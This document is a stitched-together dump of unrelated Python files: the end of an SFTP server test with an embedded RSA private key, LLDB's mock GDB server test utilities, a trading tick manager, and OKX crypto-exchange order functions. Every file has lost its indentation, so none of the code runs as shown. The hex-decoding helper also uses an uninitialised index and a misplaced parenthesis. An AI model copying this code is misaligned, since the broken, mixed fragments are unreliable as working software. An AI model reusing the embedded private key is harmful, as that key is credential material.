1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
global server
server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
serverThread = threading.Thread(target=server.serve_forever)
serverThread.daemon = True
serverThread.start()
def tearDownModule():
if server:
server.shutdown()
server.server_close()
base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
def testSftpService(self):
users = ({
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
}, {
'email': 'regularuser@email.com',
'login': 'regularuser',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
})
admin, user = [User().createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = Folder().findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
Upload().uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
Collection().createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='anonymous')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
|
gdbclientutils.py
|
import ctypes
import errno
import io
import os
import os.path
import threading
import socket
import lldb
import binascii
import traceback
from lldbsuite.support import seven
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
Most bytes are sent through as-is, but $, #, and { are escaped by writing
a { followed by the original byte mod 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
hex_len = len(hex_bytes)
while i < hex_len - 1:
out += chr(int(hex_bytes[i:i + 2]), 16)
i += 2
return out
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet.startswith("vCont;c"):
return self.vCont(packet)
if packet[0] == "A":
return self.A(packet)
if packet[0] == "D":
return self.D(packet)
if packet[0] == "g":
return self.readRegisters()
if packet[0] == "G":
# Gxxxxxxxxxxx
# Gxxxxxxxxxxx;thread:1234;
return self.writeRegisters(packet[1:].split(';')[0])
if packet[0] == "p":
regnum = packet[1:].split(';')[0]
return self.readRegister(int(regnum, 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qsThreadInfo":
return self.qsThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet == "s":
return self.haltReason()
if packet[0] == "H":
tid = packet[2:]
if "." in tid:
assert tid.startswith("p")
# TODO: do we want to do anything with PID?
tid = tid.split(".", 1)[1]
return self.selectThread(packet[1], int(tid, 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
if packet.startswith("qThreadStopInfo"):
threadnum = int (packet[15:], 16)
return self.threadStopInfo(threadnum)
if packet == "QThreadSuffixSupported":
return self.QThreadSuffixSupported()
if packet == "QListThreadsInStopReply":
return self.QListThreadsInStopReply()
if packet.startswith("qMemoryRegionInfo:"):
return self.qMemoryRegionInfo(int(packet.split(':')[1], 16))
if packet == "qQueryGDBServer":
return self.qQueryGDBServer()
if packet == "qHostInfo":
return self.qHostInfo()
if packet == "qGetWorkingDir":
return self.qGetWorkingDir()
if packet == "qOffsets":
return self.qOffsets();
if packet == "qsProcessInfo":
return self.qsProcessInfo()
if packet.startswith("qfProcessInfo"):
return self.qfProcessInfo(packet)
if packet.startswith("qPathComplete:"):
return self.qPathComplete()
if packet.startswith("vFile:"):
return self.vFile(packet)
if packet.startswith("vRun;"):
return self.vRun(packet)
if packet.startswith("qLaunchSuccess"):
return self.qLaunchSuccess()
if packet.startswith("QEnvironment:"):
return self.QEnvironment(packet)
if packet.startswith("QEnvironmentHexEncoded:"):
return self.QEnvironmentHexEncoded(packet)
if packet.startswith("qRegisterInfo"):
regnum = int(packet[len("qRegisterInfo"):], 16)
return self.qRegisterInfo(regnum)
return self.other(packet)
def qsProcessInfo(self):
return "E04"
def qfProcessInfo(self, packet):
return "E04"
def qGetWorkingDir(self):
return "2f"
def qOffsets(self):
return ""
def qHostInfo(self):
return "ptrsize:8;endian:little;"
def qQueryGDBServer(self):
return "E04"
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def vCont(self, packet):
raise self.UnexpectedPacketException()
def A(self, packet):
return ""
def D(self, packet):
return "OK"
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qsThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def threadStopInfo(self, threadnum):
return ""
def other(self, packet):
# empty string means unsupported
return ""
def QThreadSuffixSupported(self):
return ""
def QListThreadsInStopReply(self):
return ""
def qMemoryRegionInfo(self, addr):
return ""
def qPathComplete(self):
return ""
def vFile(self, packet):
return ""
def vRun(self, packet):
return ""
def qLaunchSuccess(self):
return ""
def QEnvironment(self, packet):
return "OK"
def QEnvironmentHexEncoded(self, packet):
return "OK"
def qRegisterInfo(self, num):
return ""
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class ServerSocket:
"""
A wrapper class for TCP or pty-based server.
"""
def get_connect_address(self):
"""Get address for the client to connect to."""
def get_connect_url(self):
"""Get URL suitable for process connect command."""
def close_server(self):
"""Close all resources used by the server."""
def accept(self):
"""Accept a single client connection to the server."""
def close_connection(self):
"""Close all resources used by the accepted connection."""
def recv(self):
"""Receive a data packet from the connected client."""
def sendall(self, data):
"""Send the data to the connected client."""
class TCPServerSocket(ServerSocket):
def __init__(self):
family, type, proto, _, addr = socket.getaddrinfo(
"localhost", 0, proto=socket.IPPROTO_TCP)[0]
self._server_socket = socket.socket(family, type, proto)
self._connection = None
self._server_socket.bind(addr)
self._server_socket.listen(1)
def get_connect_address(self):
return "[{}]:{}".format(*self._server_socket.getsockname())
def get_connect_url(self):
return "connect://" + self.get_connect_address()
def close_server(self):
self._server_socket.close()
def accept(self):
assert self._connection is None
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._server_socket.settimeout(30.0)
client, client_addr = self._server_socket.accept()
# The connected client inherits its timeout from self._socket,
# but we'll use a blocking socket for the client
client.settimeout(None)
self._connection = client
def close_connection(self):
assert self._connection is not None
self._connection.close()
self._connection = None
def recv(self):
assert self._connection is not None
return self._connection.recv(4096)
def sendall(self, data):
assert self._connection is not None
return self._connection.sendall(data)
class PtyServerSocket(ServerSocket):
def __init__(self):
import pty
import tty
master, slave = pty.openpty()
tty.setraw(master)
self._master = io.FileIO(master, 'r+b')
self._slave = io.FileIO(slave, 'r+b')
def get_connect_address(self):
libc = ctypes.CDLL(None)
libc.ptsname.argtypes = (ctypes.c_int,)
libc.ptsname.restype = ctypes.c_char_p
return libc.ptsname(self._master.fileno()).decode()
def get_connect_url(self):
return "file://" + self.get_connect_address()
def close_server(self):
self._slave.close()
self._master.close()
def recv(self):
try:
return self._master.read(4096)
except OSError as e:
# closing the pty results in EIO on Linux, convert it to EOF
if e.errno == errno.EIO:
return b''
raise
def sendall(self, data):
return self._master.write(data)
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
_socket = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, socket_class):
self._socket_class = socket_class
self.responder = MockGDBServerResponder()
def start(self):
self._socket = self._socket_class()
# Start a thread that waits for a client connection.
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
self._socket.close_server()
self._thread.join()
self._thread = None
def get_connect_address(self):
return self._socket.get_connect_address()
def get_connect_url(self):
return self._socket.get_connect_url()
def _run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
self._socket.accept()
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
while True:
try:
data = seven.bitcast_to_string(self._socket.recv())
if data is None or len(data) == 0:
break
self._receive(data)
except Exception as e:
print("An exception happened when receiving the response from the gdb server. Closing the client...")
traceback.print_exc()
self._socket.close_connection()
break
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
try:
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
except self.InvalidPacketException:
self._socket.close_connection()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
its data is removed form self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._socket.sendall(seven.bitcast_to_bytes('+'))
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
# Handle packet framing since we don't want to bother tests with it.
if response is not None:
framed = frame_packet(response)
self._socket.sendall(seven.bitcast_to_bytes(framed))
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class InvalidPacketException(Exception):
pass
class GDBRemoteTestBase(TestBase):
"""
Base class for GDB client tests.
This class will setup and start a mock GDB server for the test to use.
It also provides assertPacketLogContains, which simplifies the checking
of packets sent by the client.
"""
NO_DEBUG_INFO_TESTCASE = True
mydir = TestBase.compute_mydir(__file__)
server = None
server_socket_class = TCPServerSocket
def setUp(self):
TestBase.setUp(self)
self.server = MockGDBServer(socket_class=self.server_socket_class)
self.server.start()
def tearDown(self):
# TestBase.tearDown will kill the process, but we need to kill it early
# so its client connection closes and we can stop the server before
# finally calling the base tearDown.
if self.process() is not None:
self.process().Kill()
self.server.stop()
TestBase.tearDown(self)
def createTarget(self, yaml_path):
"""
Create a target by auto-generating the object based on the given yaml
instructions.
This will track the generated object so it can be automatically removed
during tearDown.
"""
yaml_base, ext = os.path.splitext(yaml_path)
obj_path = self.getBuildArtifact(yaml_base)
self.yaml2obj(yaml_path, obj_path)
return self.dbg.CreateTarget(obj_path)
def connect(self, target):
"""
Create a process by connecting to the mock GDB server.
Includes assertions that the process was successfully created.
"""
listener = self.dbg.GetListener()
error = lldb.SBError()
process = target.ConnectRemote(listener,
self.server.get_connect_url(), "gdb-remote", error)
self.assertTrue(error.Success(), error.description)
self.assertTrue(process, PROCESS_IS_VALID)
return process
def assertPacketLogContains(self, packets):
"""
Assert that the mock server's packet log contains the given packets.
The packet log includes all packets sent by the client and received
by the server. This fuction makes it easy to verify that the client
sent the expected packets to the server.
The check does not require that the packets be consecutive, but does
require that they are ordered in the log as they ordered in the arg.
"""
i = 0
j = 0
log = self.server.responder.packetLog
while i < len(packets) and j < len(log):
if log[j] == packets[i]:
i += 1
j += 1
if i < len(packets):
self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
(packets[i], u'\n\t'.join(log)))
class GDBPlatformClientTestBase(GDBRemoteTestBase):
"""
Base class for platform server clients.
This class extends GDBRemoteTestBase by automatically connecting
via "platform connect" in the setUp() method.
"""
def setUp(self):
super().setUp()
self.runCmd("platform select remote-gdb-server")
self.runCmd("platform connect " + self.server.get_connect_url())
self.assertTrue(self.dbg.GetSelectedPlatform().IsConnected())
def tearDown(self):
self.dbg.GetSelectedPlatform().DisconnectRemote()
super().tearDown()
|
tick_manager.py
|
from threading import Thread, Lock
from config import config
from slq_lite_database import Storage
from tick_listener import TickListener
from position import Position
from trade_algorithm import TradeAlgorithm
class TickManager(TickListener):
def __init__(self, priceHistory) -> None:
self.MAX_POSITION_LOAD = config['positionLoad']
self.SYMBOL = config['tickerSymbol']
self.tradeAlgorithm = TradeAlgorithm(self.__enter_position)
self.positionLock = Lock()
self.storage = Storage()
self.positions = self.storage.open_positions()
self.tickHistory = priceHistory
def tick_event(self, tickPrice, closePeriod):
thread = Thread(target=self.__tick_worker, args=(tickPrice, closePeriod))
thread.start()
def __tick_worker(self, tickPrice, onClose):
print("tick event thread started")
self.positionLock.acquire()
for p in self.positions:
if p.inPosition:
p.notify(tickPrice)
else:
self.storage.close_position(p)
self.positions.remove(p)
if onClose:
self.__update(tickPrice)
self.positionLock.release()
def __update(self, tickPrice):
self.tickHistory.append(tickPrice)
ma = self.tradeAlgorithm.evaluate(self.tickHistory)
for p in self.positions:
p.notify_close(tickPrice, ma)
self.tickHistory = self.tickHistory[-120:]
def __enter_position(self) -> None:
if len(self.positions) < self.MAX_POSITION_LOAD:
new_position = Position.create_position(self.tickHistory[-1], self.SYMBOL)
self.storage.new_position(new_position)
self.positions.append(new_position)
|
OKX_cusID_open_1007.py
|
import okex.Public_api as Public
import okex.Trade_api as Trade
import okex.Account_api as Account
import okex.Market_api as Market
import okex.Funding_api as Funding
from multiprocessing import Process, Queue, Pool,Manager
import os,sys
import numpy as np
import asyncio
import websockets
import json
import requests
import psutil
import hmac
import base64
import zlib
import datetime
from datetime import datetime
import pandas as pd
import time
import nest_asyncio
import math
from decimal import Decimal, getcontext, setcontext,ROUND_DOWN, ROUND_UP,ROUND_CEILING
from dateutil.parser import parse
nest_asyncio.apply()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def take_long_order(mode_take_long_order,*args,**kwargs):
swap_instrument_id = mode_take_long_order['swap_instrument_id']
spot_instrument_id = mode_take_long_order['spot_instrument_id']
spot_price = mode_take_long_order['spot_price']
swap_price = mode_take_long_order['swap_price']
spot_size = mode_take_long_order['spot_size']
swap_size = mode_take_long_order['swap_size']
spot_order_type = mode_take_long_order['spot_order_type']
swap_order_type = mode_take_long_order['swap_order_type']
# spot下单
if float(spot_size) !=0:
A = tradeAPI.place_order(instId=spot_instrument_id , tdMode='cross', side='buy', ordType=spot_order_type, sz=spot_size, px=spot_price)
else:
A='none'
# swap下单
if float(swap_size) != 0:
# 应该是因为买卖模式的关系,没有posSide的设定
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return A,B
def take_short_order(mode_take_short_order,*args,**kwargs):
swap_instrument_id = mode_take_short_order['swap_instrument_id']
spot_instrument_id = mode_take_short_order['spot_instrument_id']
spot_price = mode_take_short_order['spot_price']
swap_price = mode_take_short_order['swap_price']
spot_size = mode_take_short_order['spot_size']
swap_size = mode_take_short_order['swap_size']
spot_order_type = mode_take_short_order['spot_order_type']
swap_order_type = mode_take_short_order['swap_order_type']
# spot下单
if float(spot_size)!=0:
A = tradeAPI.place_order(instId=spot_instrument_id , tdMode='cross', side='sell', ordType=spot_order_type, sz=spot_size, px=spot_price) #这里先没写posSide
else:
A='none'
# swap下单
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return A,B
def take_close_long_order(mode_take_close_long_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_order['swap_instrument_id']
spot_instrument_id = mode_take_close_long_order['spot_instrument_id']
spot_close_price = mode_take_close_long_order['spot_close_price']
swap_close_price = mode_take_close_long_order['swap_close_price']
spot_close_size = mode_take_close_long_order['spot_close_size']
swap_close_size = mode_take_close_long_order['swap_close_size']
spot_order_type = mode_take_close_long_order['spot_order_type']
swap_order_type = mode_take_close_long_order['swap_order_type']
# spot下单
if float(spot_close_size) != 0:
A = tradeAPI.place_order(instId=spot_instrument_id, tdMode='cross', side='sell', ordType=spot_order_type, sz=spot_close_size, px=spot_close_price)
else:
A = 'none'
# swap下单
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return A, B
def take_close_short_order(mode_take_close_short_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_order['swap_instrument_id']
spot_instrument_id = mode_take_close_short_order['spot_instrument_id']
spot_close_price = mode_take_close_short_order['spot_close_price']
swap_close_price = mode_take_close_short_order['swap_close_price']
spot_close_size = mode_take_close_short_order['spot_close_size']
swap_close_size = mode_take_close_short_order['swap_close_size']
spot_order_type = mode_take_close_short_order['spot_order_type']
swap_order_type = mode_take_close_short_order['swap_order_type']
# spot下单
if float(spot_close_size) != 0:
A = tradeAPI.place_order(instId=spot_instrument_id, tdMode='cross', side='buy', ordType=spot_order_type, sz=spot_close_size, px=spot_close_price)
else:
A = 'none'
# swap下单
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return A, B
def take_open_long_final_open_order(mode_take_open_long_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_open_long_final_open_order['swap_instrument_id']
swap_price = mode_take_open_long_final_open_order['swap_price']
swap_size = mode_take_open_long_final_open_order['swap_size']
swap_order_type = mode_take_open_long_final_open_order['swap_order_type']
# swap继续开空
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_short_final_open_order(mode_take_open_short_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_open_short_final_open_order['swap_instrument_id']
swap_price = mode_take_open_short_final_open_order['swap_price']
swap_size = mode_take_open_short_final_open_order['swap_size']
swap_order_type = mode_take_open_short_final_open_order['swap_order_type']
# swap继续开多
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_long_final_close_order(mode_take_open_long_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_open_long_final_close_order['swap_instrument_id']
swap_price = mode_take_open_long_final_close_order['swap_price']
swap_size = mode_take_open_long_final_close_order['swap_size']
swap_order_type = mode_take_open_long_final_close_order['swap_order_type']
# swap仓位多于spot,要平空
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_short_final_close_order(mode_take_open_short_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_open_short_final_close_order['swap_instrument_id']
swap_price = mode_take_open_short_final_close_order['swap_price']
swap_size = mode_take_open_short_final_close_order['swap_size']
swap_order_type = mode_take_open_short_final_close_order['swap_order_type']
# swap仓位多于spot,要平多
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
